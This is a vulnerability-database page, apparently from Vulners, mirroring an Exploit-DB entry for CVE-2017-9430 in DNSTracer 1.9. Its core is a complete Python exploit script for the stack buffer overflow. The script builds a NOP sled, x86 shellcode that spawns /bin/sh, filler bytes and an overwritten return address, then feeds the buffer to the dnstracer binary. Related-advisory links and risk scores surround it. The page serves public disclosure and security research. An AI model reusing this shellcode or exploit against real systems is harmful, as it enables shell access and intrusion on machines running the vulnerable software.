Lucene search
K

DNSTracer 1.9 - Local Buffer Overflow

🗓️ 03 Aug 2017 00:00:00Reported by j0lamaType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 119 Views

DNSTracer 1.9 vulnerable to local buffer overflow; CVE-2017-9430 exploit demonstrated.

Related
Code
ReporterTitlePublishedViews
Family
0day.today
DNSTracer 1.8.1 - Buffer Overflow Vulnerability
5 Jun 201700:00
zdt
0day.today
DNSTracer 1.9 - Buffer Overflow Exploit
3 Aug 201700:00
zdt
Circl
CVE-2017-9430
5 Jun 201700:00
circl
CNVD
DNSTracer Stack Buffer Overflow Vulnerability
7 Jun 201700:00
cnvd
CVE
CVE-2017-9430
5 Jun 201711:12
cve
Cvelist
CVE-2017-9430
5 Jun 201711:12
cvelist
Debian CVE
CVE-2017-9430
5 Jun 201711:12
debiancve
Exploit DB
DNSTracer 1.8.1 - Buffer Overflow (PoC)
5 Jun 201700:00
exploitdb
exploitpack
DNSTracer 1.9 - Local Buffer Overflow
3 Aug 201700:00
exploitpack
exploitpack
DNSTracer 1.8.1 - Buffer Overflow (PoC)
5 Jun 201700:00
exploitpack
Rows per page
# Exploit Title: DNSTracer 1.9 - Buffer Overflow
# Google Dork: [if applicable]
# Date: 03-08-2017
# Exploit Author: j0lama
# Vendor Homepage: http://www.mavetju.org/unix/dnstracer.php
# Software Link: http://www.mavetju.org/download/dnstracer-1.9.tar.gz
# Version: 1.9
# Tested on: Ubuntu 12.04
# CVE : CVE-2017-9430
# Bug report: https://www.exploit-db.com/exploits/42115/
# Vulnerability analysis: http://jolama.es/temas/dnstracer-exploit/index.php


# Proof of Concept
import os
from subprocess import call

def run():
    try:
        print "\nDNSTracer Stack-based Buffer Overflow"
        print "Author: j0lama"
        print "Tested with Dnstracer compile without buffer overflow protection"

        nops = "\x90"*1006
        shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
        filling = "A"*24
        eip = "\x2f\xeb\xff\xbf"

        #buf size = 1057
        buf = nops + shellcode + filling + eip

        call(["./dnstracer", buf])

    except OSError as e:
        if e.errno == os.errno.ENOENT:
            print "\nDnstracer not found!\n"
        else:
            print "\nError executing exploit\n"
        raise


if __name__ == '__main__':
    try:
        run()
    except Exception as e:
        print "Something went wrong"

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

03 Aug 2017 00:00Current
9.6High risk
Vulners AI Score9.6
CVSS 27.5
CVSS 39.8
EPSS0.14685
119